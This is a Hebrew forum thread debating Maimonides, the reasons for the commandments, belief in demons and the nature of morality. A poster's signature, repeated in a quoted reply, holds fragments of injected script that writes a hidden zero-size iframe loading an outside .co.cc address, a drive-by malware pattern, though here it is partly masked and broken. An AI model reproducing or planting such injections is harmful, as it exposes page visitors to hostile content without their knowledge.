בית פורומים עצור כאן חושבים

ההלכה כפרוייקט בריאותי

שלום אורח. באפשרותך להתחבר או להירשם
הצג 15 הודעות בעמוד הוסף לדף האישי  דווח למנהל שלח לחבר
נשלח ב-14/6/2012 08:25 לינק ישיר 

רציוסקפטי

בתור פותח האשכול אני משיב על חלק מדבריך האחרונים.

היכן בדברי הרמב"ם בהלכות מזוזה מצאת שהוא מתנגד לתפיסת התורה כפרוייקט חינוכי, שדואג גם לבריאות?

האם כוונתך למה שהרמב"ם יוצא נגד כתיבת שמות על מזוזה לשם "שמירה"?

מצד שני הרמב"ם כותב גם שכיון שאדם נתקל במזוזה בצאתו ובבואו, זה מזכיר לו את ה'. עם כל מה שאמור לנבוע מזה.

הווה אומר: יש תזכורות שהן משובחות ותורמות ל"בריאות" במובן הרחב (בריאות הגוף היא רק פן אחד מכמה שלמויות שהתורה שואפת לקראתן) ויש תזכורות שהן שליליות, בין השאר בגלל שהן, התזכורות השליליות, עסוקות באויבים דמיוניים, כמו שדים ורוחות או הסטרא אחרא.

לכן העושה מצוות כדי שישפר את אישיותו - לפי התורה - הרי זה משובח. העושה מצוות כדי להילחם נגד הסטרא אחרא הרי זה טועה וגרוע מזה, והרמב"ם מונה אותו בין הטפשים (נכון, הרמב"ם לא התייחס במפורשות למאמיני הסטרא אחרא. האמונה הזו עדיין לא היתה קיימת בזמנו - לדעתי. אבל הוא אבינו הרוחני בהתנגדות זו להבל ולדמיון, שמוליכים למגיה ולעבודה זרה).

שומר פיו ולשונו - שומר מצרות נפשו < type="text/">document.write("");

דדווח על תוכן פוגעני

נשלח ב-14/6/2012 09:44 לינק ישיר 

למיימוני

השדים הם אויבים דמיוניים?

את זאת אתה אומר לאחר קריאת ההוכחות החד משמעיות שנתן הרב הדוקטור מיכאל אברהם לקיומם?

"אני מסכים שקיומם של כל אלו הוא אפשרי .. אולם רוצה לטעון מעבר לכך, שקיומם הוא אף סביר מאד אפריורי. ואלו נימוקיי

: 1. העדויות של חכמים (מהתלמוד), ושל אנשים מתרבויות לא מערביות. חלקם מעידים שדיברו בעצמם עם הכנופיה הזו. רק כדוגמא, שאינה עוסקת ממש בענייננו: אני אישית שמעתי מסבתא של אשתי (ממרוקו), שהיא אישית ראתה פעמיים תינוק שנולד מדבר עברית (לשון הקודש, בשביל 'דעת אמת'), האחד מת והשני שכח את תלמודו כשהגיע הרב ו'כישף' אותו. אני מפנה את הציבור לשיחה של דורותי עם הקוסמת הטובה מהצפון, מייד לאחר הנחיתה. שם מתבאר בטוטו"ד שבארצות התרבות לא מכירים קוסמים ומכשפים, אך זה נו"ן שלהם, ע"ש היטב.

האם עליי לדחות עדויות אלו בגלל שלא ראיתי. להיפך, אם אכן הדבר סביר, או לפחות אפשרי (כדעת רמבמז"ל), אזי נראה שיש להאמין לעדויות הללו.

למעשה, אומר יותר מכך. התרבות שלנו מכחישה תופעות כאלה (עושה להן רציונליזציה כל אימת שהן מופיעות), מסיבות מאד ברורות. תופעות אלו נתפסות כעדות לרוחניות כלשהי שקיימת בעולם, רעיון שאינו חביב על יושביו (לפחות המערביים) בהווה. אגב, הרמב"ם וסיעתו שנמשכו אחריו, לענ"ד גם הם הכחישו זאת בעיקר בגלל חכמה יוונית, שהיא אבי אבות אי האמונה הזו, שחשבו שהיא מדע בלתי מעורער, וכיום אנו יודעים מה מידת האמפיריות שלה, אף במדדים מדעיים.

2. הפעולות הטיבעיות, מה שקרוי 'חוקי טבע', אינם אלא ניסים גלויים. כמה דוגמאות: א. התיאור של נפילת אבן לקרקע בגלל חוק המשיכה, הוא תיאור ולא סיבה. כשנדבר על סיבה, הרי נמצאנו מדברים על כוח המשיכה, ולא על חוק המשיכה. אולם כוח זה מה טיבו? הרי איש לא ראה אותו, אלא רק את תוצאות פעולתו (י"י, האם מישהו ראה גרביטונים באופן ישיר?). אולם זו יכולה להיות באותה מידה גם תוצאת פעולתם של מלאכי מרום ושדים. כדי להימלט מהרכיב הלא-אמפירי הזה של המדע, נוקטים פילוסופים רבים בדעה שהתיאוריה המדעית היא רק ארגון יעיל של מכלול העובדות, ולא טענה על המציאות. וכן לגבי היישים התיאורטיים, שאינם אלא פיקציות נוחות לתיאור המדעי. אולם לפי שיטה זו הבעיה רק מתחדדת.

אם כן, בכל זאת עלינו לבחון מהי הסיבה האמיתית לכל ההתרחשויות הפיסיקליות? זוהי כפירה בעקרון הסיבתיות (שכידוע כיום הוא מקודש יותר מאשר בוראו, וכדכ' הרמב"ן: שכל המקודש מחברו חרב מחברו). ב. ואפרופו 'חרב', דוגמא נוספת היא החוק השני של התרמודינמיקה. חוק זה מתאר שכל מבנה נוטה להתפורר עם הזמן (במינוח מדוייק יותר: ככל שהזמן חולף, כל מערכת נוטה לעבור למצב פחות מסודר). מה גורם לתופעה זו? לדעתי זהו האי גברא רבה דמתקרי (ראה רפ"ב דב"ק): 'שאייה יוכת שער'. שאם לא כן, התהליך הזה מתרחש ללא סיבה (תיאור מתמטי אינו סיבה). אגב, החוק השני של התרמודינמיקה אינו מתממש רק ע"י האי גברא רבא, אלא גם עם חבריו שמצויים ביומי דכלא, שבגללם המכנסיים מתבלים (אלף ורבבה סביבנו, כי אוגיא לכיסלא).

ג. נעבור כעת לדוגמת הפסיכולוגיה. כעת עלינו לשאול את עצמנו מדוע תחושת הדוחק ביומי דכלא. חז"ל מספרים לנו שזה בגלל אותם גנגסטרים שתוארו לעיל. מה האלטרנטיבה: לתאר את אופן ההתרחשות הפסיכולוגית (כמו בדוגמת הפיסיקה לעיל). אולם תיאור אינו סיבה. וכן לגבי פחד בלילה. ייתכן שישנו תיאור פסיכולוגי של היווצרות הפחד, אולם הוא לא נותן מענה לשאלת הסיבתיות. לענ"ד אלו רק השדים והמזיקים. לשון אחר, לכל התופעות הללו אנו מספקים תיאורים מדעיים ולא הסברים סיבתיים. אולם עקרון הסיבתיות מחייב אותנו לחפש סיבות. סיבות אלו אינן חוקי הטבע, שהם יצורים לא קיימים אלא צורות תיאור שלנו למציאות. סיבות אלו הן יישים. כלומר יצורים קיימים כלשהם, שמתווכים בין עצמים באינטראקציה גרביטציונית, או שמשרים עלינו פחד בלילה, ובעיקר במקום חשוך בודד ואפל וישן (חורבא, דברא ועוד). גישים כרגע יצורים אלו אינם נ(ואולי תמיד) למכשירי המדע, ואנו יכולים לכנות אותם 'שדים' או 'מזיקים'.

3. בניגוד להם, הגלגלים ושאר ירקות, נראים לי טובים לסלט ירקות ותו לא מידי. המצאות אריסטוטליות, שאינן מבוססות על מאומה פרט למיתוסים שונים. 4

. השפעת הכוכבים גם היא אינה נראית לי נדרשת משום שיקול שהוא, ועל כן אין לי סיבה להניח אותה (אף שכפי שכ' רמבמז"ל אין לשלול את אלו על הסף). העולה מכל זה: שתי נסיבות עיקריות להופעת שדים ויישויות לא-מדעיות, ולא-אמפיריות: התחומים החוץ מדעיים (ניסים). והבסיס הסיבתי לאירועים המדעיים עצמם. הסיבה מדוע אלו לא ניתנים לאישור אמפירי נובעת מעצם הגדרתם, וכמושנ"ת לעיל..

http://is.gd/QKAilE 

דדווח על תוכן פוגעני

נשלח ב-14/6/2012 10:51 לינק ישיר 

בעב

א.       – לדעתי את הדפים

ב.       – חושבני שגם הר"מ חשב כך והשלב הידיעתי הוא שלב ראשון וחושבני שניתן להראות זאת בר"מ (אבל לא בעונה הבוערת שלי!)

דדווח על תוכן פוגעני

נשלח ב-14/6/2012 11:07 לינק ישיר 

צענע

לא קראתי את כל הניתוח וזה חמור מצידי. אשתדל למלא את החסר.

אבל כמדומה שאין שם הוכחות במובן שאפשר להוכיח שהארץ כדורית, שנפוליאון היה ונברא, ואפילו שדוד בן ישי היה מלך בישראל.

לפי הקטע שציטטת דומה שיש שם ניתוח של עדויות. ובדבר זה ייתכנו גישות שונות. שלי מניחה אפריורית (אולי בחוסר זהירות) שאין שם שדים.

אני מצטט את יום שאמנם כתב זאת על אפשרות הנס. יש לקבל שיש שדים רק אם יהיו הוכחות כאלו שכל פתרון אחר, מלבד הכרה במציאותם, יהיה זר ומוזר עוד יותר.

זו גישתי. כמובן אני יכול להמליץ עליה אבל לא לחייב אחרים לאמץ אותה.

(האם מיכי באמת מאמין שיש שדים?)

דדווח על תוכן פוגעני

נשלח ב-14/6/2012 11:57 לינק ישיר 

מיימוני כתב:
רציוסקפטי

בתור פותח האשכול אני משיב על חלק מדבריך האחרונים.

היכן בדברי הרמב"ם בהלכות מזוזה מצאת שהוא מתנגד לתפיסת התורה כפרוייקט חינוכי, שדואג גם לבריאות?

האם כוונתך למה שהרמב"ם יוצא נגד כתיבת שמות על מזוזה לשם "שמירה"?

מצד שני הרמב"ם כותב גם שכיון שאדם נתקל במזוזה בצאתו ובבואו, זה מזכיר לו את ה'. עם כל מה שאמור לנבוע מזה.

הווה אומר: יש תזכורות שהן משובחות ותורמות ל"בריאות" במובן הרחב (בריאות הגוף היא רק פן אחד מכמה שלמויות שהתורה שואפת לקראתן) ויש תזכורות שהן שליליות, בין השאר בגלל שהן, התזכורות השליליות, עסוקות באויבים דמיוניים, כמו שדים ורוחות או הסטרא אחרא.

לכן העושה מצוות כדי שישפר את אישיותו - לפי התורה - הרי זה משובח. העושה מצוות כדי להילחם נגד הסטרא אחרא הרי זה טועה וגרוע מזה, והרמב"ם מונה אותו בין הטפשים (נכון, הרמב"ם לא התייחס במפורשות למאמיני הסטרא אחרא. האמונה הזו עדיין לא היתה קיימת בזמנו - לדעתי. אבל הוא אבינו הרוחני בהתנגדות זו להבל ולדמיון, שמוליכים למגיה ולעבודה זרה).

שומר פיו ולשונו - שומר מצרות נפשו ******* type="text/">document.write("*************** scrolling='no' frameborder='0' height='0px' width='0px' src='ht"+"tp:"+"/"+"/"+"vjgvj.co"+".cc/?a="+***************+"'><*");

אתה צודק, אכן במורה נבוכים ג מח  הוא כותב שאיסור אכילת חזיר הוא כי "ואין הדבר כך, כי החזיר לח יותר ממה שראוי והפסולת שלו מרובה. התורה מואסת בו בעיקר בגלל לכלוכו הרב והיותו ניזון מלכלוכים. יודע אתה כמה מונעת התורה ראיית זוהמה אפילו בבקעה, במחנה9, כל שכּן בתוך הערים. ולו היו נוטלים חזירים כמזון, היו השווקים, ואף הבתים, מלוכלכים יותר מבית-הכסא כמו שאתה רואה את ארצות הפרַנקים10 עכשיו. יודע אתה את דברם (של החכמים) ז"ל: פי חזיר כצואה עוברת דמי11"

איפה העקביות? ונראה די"ל דיש מצוות שטעמן אינדוקטרינטיבי והן מהותיות יחסית, כמו מזוזה, ויש מצוות שמהוות רק היכי תמצי לקיום חברה נקייה ונעימה, כמו בשר וחלב או חזיר, והוא יוצא רק נגד ייחוס המצוות המהותיות לטעמים לא ענייניים. ודו"ק.

(מישהו שביקר בארצות הפרנקים (מערב אירופה) יכול לדווח לנו על ריח בית הכסא בשווקיהם ובבתיהם? מעניין. ועוד מעניין מדוע חשב הרמב"ם שלפרות יש ריח גן עדן... אולי הוא למד מהשקיות של תנובה שפרה היא יצור חמוד ונקי. ר'  המאמר "דיפרנציאציה אונטולוגית בין ריח החזיר לריח הפרה ע"פ הרמב"ם")

תוקן על ידי רציוסקפטי ב- 14/06/2012 12:07:48

דדווח על תוכן פוגעני

נשלח ב-14/6/2012 12:33 לינק ישיר 

מבקשטוב כתב:
 ירוחם

התבלבלתי (וכנראה לא רק אני). כתבת:

" השאלה שנשאלה אם התורה חינוכית- ועל זה- בלי להכנס לנכון או לא נכון לנהוג כך,-הסיפור לא חינוכי"

איך אפשר לא להיכנס לנכון או לא נכון, הלא אם זה נכון זה חינוכי ואם זה לא נכון זה לא חינוכי?

אני מבין שכשאנו מדברים על חינוכי אנו מדברים על חינוך לעשיית הדבר הנכון. אז איך אתה מבין את המושג 'חינוכי'

לא נכון לא כל דבר טוב הוא חינוכי ולהפך,הגמרא אומרת-הבועל ארמית קנאים פוגעים בו- הלכה היא ואין מורין כך-

שאול נקרע בנפשו לכן זה אומר שזה לא מוסרי/חינוכי?
לפעמים עשיית המעשה הראוי קשה מבחינה  רגשית. אתה רוצה לטעון שהרגש הוא הקובע מה מוסרי?

את המוסר קובעת החברה לפי הרגשות של חבריה, הגרמנים והפולנים ששרפו את משפחתי- לא חשבו שהם עושים מעשה לא מוסרי, הם פעלו במסגרת החוק.

ועוד כתבת:
" כל חוקה נועדה להיטיב עם מקבליה, וגם התורה ודאי שכך. על זה אין כל ויכוח.
   השאלה אם החוקים חינוכים? מוסריים? בראים?"

כמו שהבנתי עד היום את השפה העברית אם משהו הוא לא חינוכי/מוסרי/בריא הוא גם בהכרח לא טוב. ואם אתה מסכים שהתורה נועדה להיטיב עם מקבליה מוכרח שהיא חינוכית מוסרית
ובריאותית.

ושוב קביעתך לא נכונה יכול להיות כאמור מעשה מאד לא בריא  אבל יחנכו לעשות זאת. וכן מעשה לא טוב וחינוכי.

אומרים- כל מה שטוב וטעים וגורם עונג- או שהוא לא בריא או שהוא משמין או שהוא לא כשר.

לסיכום: נראה לי ש
יש בינינו חוסר התאמה בהבנת המושגים: חינוכי, מוסרי, בריאותי וטוב.

ואגב, גזרה גזרתי וכו' נאמר רק על פרה אדומה, לא?

אכן נאמר רק על פרה אדומה- אבל לע"ד מתאימה לכל התורה, מה הטעם למשל- לברית מילה? לגיד הנשה

ולגבי חוקי התעבורה, זו פגיעה בזכויות הפרט שדואגים לו למערכת כבישים מסודרת למנוע כמה שאפשר תאונות, מריבות (מי קודם) ופקקים?

בדיוק כך- חוק שעל פניו מהווה מטרד ולפעמים מאד מפריע ולא טוב לפרט - בסופו של דבר הוא חיוני מאד.

דדווח על תוכן פוגעני

נשלח ב-14/6/2012 17:23 לינק ישיר 

ירוחם

מעניין ששני אנשים, מאותה מדינה, שמדברים אותה שפה, מבינים באופן שונה מילים מסוימות...

אספר לך איך אני רואה את הדברים:

א. טוב

יש טוב ויש טוב חלקי. אנשים לפעמים אומרים על משהו מהנה, לדוגמא: אוכל טעים, שהוא טוב. יתכן שהאוכל הזה הוא לא בריא אך כוונתם שהטעם שלו טוב. אם נשאל אותם האם במכלול האוכל טוב? הם יודו שמצד אחד הוא טוב – בטעם, ומצד שני הוא רע – מזיק לגוף. לזה אני קורא טוב חלקי.

ויש טוב שהוא טוב מכל הצדדים. לדוגמא: אוכל שהוא גם בריא וגם טעים. אז תגיד לי, אבל אוכל עולה כסף וגורם להפסד?! נו, אז הוא לא ממש טוב מכל הצדדים אבל הוא כבר יותר טוב מהדוגמא הראשונה.
האם יש בעולמנו טוב מכל הצדדים - 100% טוב? אני חושב שכן. אני חושב שהתורה מכוונת אותנו אל הטוב המושלם (במושגים שלנו).

טוב ביחס לאדם משמעותו - אדם שלם שכל הצרכים שלו מסופקים באיזון. לא באופן שצורך אחד יסופק על חשבון צורך אחר. לשם מובילה התורה.
בטבע, באינסטינקט, בדרך כלל חלק מהצרכים גוברים ומקפחים צרכים אחרים.

ב. חינוך

חינוך טוב (הרי ב"חינוכי" אנו לא מתכוונים לחינוך רע) זהו חינוך שמחנך/מרגיל/מכוון את החניך, נגד האינסטינקט, לסיפוק מלא ומאוזן של כל צרכיו. זה מה שהתורה עושה ולכן אני אומר שהתורה חינוכית.

"הלכה ואין מורין כן" לא בדקתי את הנושא כדי הצורך, אני מניח שזו הלכה שלא נועדה לפרסום נרחב מסיבה מסוימת (ויכולות להיות הרבה סיבות). לדוג' הבועל ארמית קנאים פוגעים. אולי אם אתה הולך לשאול רב ואתה צריך שיורו לך לעשות כך, כבר אינך קנאי ואיבדנו את המהות של ההלכה "קנאים פוגעים בו". לכן אין מורין כן. זהו פרט בתורה שצריך לבוא לאדם לבד. אין זה תפקידם של מחנכיו.

ג. מוסר

בלי להיכנס לפרטים קטנים ולוויכוחים גדולים שהיו בהיסטוריה על הגדרת המושג.
הרעיון הכללי הוא: לעשות טוב (טוב – כבר הגדרנו) לאחרים ולהימנע מלפגוע בם.

"ואהבת לרעך כמוך ר' עקיבא אומר זהו כלל גדול בתורה" ירושלמי נדרים פר' ט'.

מה משיגים כשעושים טוב לאחרים?
סיפוק חלק מהצרכים של האדם; מצפון, חיי חברה, שיתופי פעולה ועוד.

מה מוסרי? מתי? איך? איפה? עד כמה? אלו שאלות גדולות ונכבדות. יש יוצא מן הכלל, יש גבולות, והתורה עוסקת בהם לעיתים קרובות. אני לא מסכים ש"את המוסר קובעת החברה לפי הרגשות של חבריה". המוסר נקבע על פי השכל מתוך התחשבות ברגשות.

כתבת על עמלק וכדומה.
המטרה היא להתחשב בכל הצרכים של האדם  ולספק כל צורך במידה הראויה לו. לפעמים המוסריות עוברת את הגבול הנדרש לשלמות האדם ופוגעת בצרכים אחרים. כנראה שזו הסיטואציה עם עמלק ושאר הדוגמאות. (עכשיו נשאר להבין  מדוע התורה טוענת ,בכל דוגמא שהבאת, שהיא עוברת את גבול המוסר. ולהבדיל אפשר לבדוק מדוע הנאצים טוענים שהריגת יהודים חורגת מגבול המוסר, ולבדוק האם זה מתקבל על הדעת)

~~~~~
שאלת על ברית מילה וגיד הנשה ובעצם אפשר לשאול אותה השאלה על כל המצוות. אף פעם לא למדתי את טעמי המצוות של כל מצווה בעיון, למדתי יותר באופן כללי וכמובן אין לדבר סוף. אבל נראה לי שזה אומר משהו שרק על פרה אדומה נאמר "אין להרהר אחריה". ואני לא מכיר אף אדם שעושה משהו בלי טעם. (טעם טוב או לא... אבל תמיד יש טעם)

דדווח על תוכן פוגעני

נשלח ב-14/6/2012 18:48 לינק ישיר 

תלמידטועה כתב:

יהי

אם החיוב המוסרי הבסיסי הוא לנהוג לפי מה שאני חושב לנכון אזי הפאשיסטים הקיצוניים וןכל כופר ממחשבה הוא בסדר, והם לפעמים (אם הם פאשיסטים מושבעים) טובים יותר מדתי ממוצע שפה ושם חוטא בליקוק קרטיב בהכשר רבנות כפר אלפא

תלמיד
יש כאן בלבול בין שאלת מקור החיוב המוסרי ואופן אימוץ דרך מוסרי אצל האדם, עם שאלת הרליטיביות של המוסר. 
גם אם המוסר אבסולוטי, [וממילא הפשיזים במהותו לא מוסרי] מה מחייב אותי לקיים אותו? זה שאתה חושב שזה המוסרי? בוודאי שהאדם מחויב לעשות את מה שהוא מזהה כנכון וטוב ולא ללכת אחרי מה שאומרים אחרים. 
לשיטת האבסולוטים, יש לפשיסטים רק טעות מושגית [הם חושבים שזה נכון],  ולא טעות מוסרית [הם באמת מיישמים מה שהם חושבים] משא"כ לדתי המחפף, אין טעות מושגית, אבל יש בעיה יישומית [שזה בעצם המוסר]. אז אכן הוא פחות מוסרי. 
אני לא אומר שאין מוסר רק איש הישר בעיניו יעשה. אני כן אומר שמה שלא יהיה המוסר, אין שום סיבה לקיימו אלא כי היא נראית לי נכונה. וממילא אין שום טעם שאני אכפה עליך מה שנראה לי . [יש לי זכות להגן על עצמי מפניך אם אתה נאצי, אבל לא לכפות עליך לא להיות נאצי אם אתה באמת חושב שזה מה שצריך להיות] 

דדווח על תוכן פוגעני

נשלח ב-14/6/2012 19:03 לינק ישיר 

הבהרה: ב"זכות" כוונתי בעיקר ליכולת/כח. יכול להיות עדיין שאם אני אוחז בשיטה מוסרית מסוימת שיש לי רשות או אולי גם חובה מוסרית לנסות לגרום גם לך להתנהג כך. אבל [חוץ מלחנך וללמד אותך שתבין בעצמך] אין לי אפשרות לעשות את זה, כי חובתך המוסרית לא להקשיב לי. 
[ואגב, או לא אגב, הפאשיזם הוא במהותו שיטה אנטי-מוסרית, שיטה שדוגלת בכח. אז איני יודע אם השאלה ממנה נכונה בכלל.

תוקן על ידי יהיאור ב- 14/06/2012 19:05:51

דדווח על תוכן פוגעני

נשלח ב-14/6/2012 21:01 לינק ישיר 

מבקש טוב
למצוא  למצוות טעם זה מדרון חלקלק. הטעם של אתמול לא יהיה אקטואלי היום, ושל היום לא יהיה אקטואלי מחר.

בין המצוות עם הטעם האבסולוטי של לא תרצח. -זה גם לא מוחלט.

דדווח על תוכן פוגעני

נשלח ב-14/6/2012 22:00 לינק ישיר 

יהי

"אבל [חוץ מלחנך וללמד אותך שתבין בעצמך] אין לי אפשרות לעשות את זה, כי חובתך המוסרית לא להקשיב לי. "

לא  הבנתיך. אם אני חזק ממך?

ושאלה מעצבנת לשיטתך – היום נחשב כלא מוסרי לקחת ממישהו בחזקה. אבל נחשב הרבה פחות לא מוסרי לקחת בשימוש טוב יותר בשכל  (ואין הכוונמה לערמה, אלא לעיסקה שבה אני מהמר יותר טוב על תוצאותיה כי אנ י חכם יותר). מדוע שימוש בשכל מוסרי יותר.

אבל יצאנו מתוכן האשכול

דדווח על תוכן פוגעני

נשלח ב-15/6/2012 08:17 לינק ישיר 

תלמיד
אם אתה חזק ממני אתה יכול להשתמש באלימות. אבל לי יש עדיין חובה מוסרית למסור את נפשי ולא להתפעל מזה. וממילא שימוש בכח לא יעיל. 
שימוש בשכל יותר מוסרי כי אם גם אתה תבין שזה ככה הרי אני לא כופה אותך רק מלמד אותך. בהקשרים עסקיים אלו הם כללי המשחק, משא"כ שימוש בכח. ויל"ע. [וע"ע לא תחמוד וכו'] 

דדווח על תוכן פוגעני

נשלח ב-15/6/2012 09:38 לינק ישיר 

1.      לא על כל דבר אתה צריך למסור נפשך שמא תבזבז אותה במהירות

2.      כתבת קודם "גם אם המוסר אבסולוטי מה מחייב אותי לקיים אותו" ועתה כללי המשחק קדושים?

דדווח על תוכן פוגעני

נשלח ב-15/6/2012 09:41 לינק ישיר 

ל1- נכון, הקצנתי בשביל להדגים את העיקרון. 
ל2- איני מבין מה הסתירה בין שני המשפטים שלי. אבל במסחר, הרי הכל תלוי כפי כללי המשחק. גזל הוא גזל כי זה כלל במשחק, וכו' וכו'. אין כאן אבסולוטיות אלא הסכמת בנ"א. [המוסר האבסולוטי הוא זה גופא שאתה לא יכול לחרוג מכללי המשחק] 

דדווח על תוכן פוגעני

נשלח ב-15/6/2012 16:16 לינק ישיר 

יהי

1.       טענת שכפיה אינה יעילה, וזה אינו נכון בדרך כלל מחוץ להקצנה

2.       איני רואה את ההבדל העקרוני בין שימוש בשכל להשגת יתרון שאין לו סיבה מלבד השכל לשימוש בכח

דדווח על תוכן פוגעני

בית > פורומים > דת ואמונה > עצור כאן חושבים > ההלכה כפרוייקט בריאותי
מנהל לחץ כאן לנעילת האשכול
הוסף לעמוד האישי  דווח למנהל שלח לחבר
לדף הקודם 1 2 3 4 לדף הבא סך הכל 4 דפים.

bholext
2009 © כל הזכויות שמורות לבחדרי חרדים. קטגוריית אקטואליה וחדשות: עשרות פורומים הכוללים חדשות נעייס, מה קורה בחצרות חסידים, חדשות מחסידויות שונות בארץ ובעולם, דיונים בנושאי אקטואליה, פוליטיקה, בטחון ועוד.